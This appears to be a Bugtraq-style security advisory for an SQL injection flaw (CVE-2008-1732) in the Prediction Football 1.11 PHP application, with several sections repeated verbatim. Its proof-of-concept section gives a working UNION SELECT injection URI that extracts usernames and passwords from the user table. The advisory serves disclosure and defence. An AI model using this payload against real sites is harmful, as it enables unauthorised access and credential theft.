Prediction Football 'showpredictionsformatch.php' SQL Injection Vulnerability
BID:28704
Info
Prediction Football 'showpredictionsformatch.php' SQL Injection Vulnerability
| Bugtraq ID: | 28704 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-1732 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 09 2008 12:00AM |
| Updated: | May 07 2015 05:30PM |
| Credit: | 0in from Dark-Coders Programming & Security Group |
| Vulnerable: |
Prediction Football Prediction Football 1.11 |
| Not Vulnerable: | |
Discussion
Prediction Football 'showpredictionsformatch.php' SQL Injection Vulnerability
Prediction Football is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Prediction Football 1.11 is vulnerable; other versions may also be affected.
Prediction Football is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Prediction Football 1.11 is vulnerable; other versions may also be affected.
Exploit / POC
Prediction Football 'showpredictionsformatch.php' SQL Injection Vulnerability
An attacker can exploit this issue via a browser.
The following example URI is available:
http://www.example.com/[path]/showpredictionsformatch.php?sid=dupa&matchid=-666/**/union/**/select/**/1,2,3,concat(0x757365723a,username),concat(0x7061737377643a,password),6,7/**/from/**/pluserdata/**/WHERE/**/userid=1/*
An attacker can exploit this issue via a browser.
The following example URI is available:
http://www.example.com/[path]/showpredictionsformatch.php?sid=dupa&matchid=-666/**/union/**/select/**/1,2,3,concat(0x757365723a,username),concat(0x7061737377643a,password),6,7/**/from/**/pluserdata/**/WHERE/**/userid=1/*
Solution / Fix
Prediction Football 'showpredictionsformatch.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Prediction Football 'showpredictionsformatch.php' SQL Injection Vulnerability
References:
References:
- Prediction Football Homepage (Prediction Football)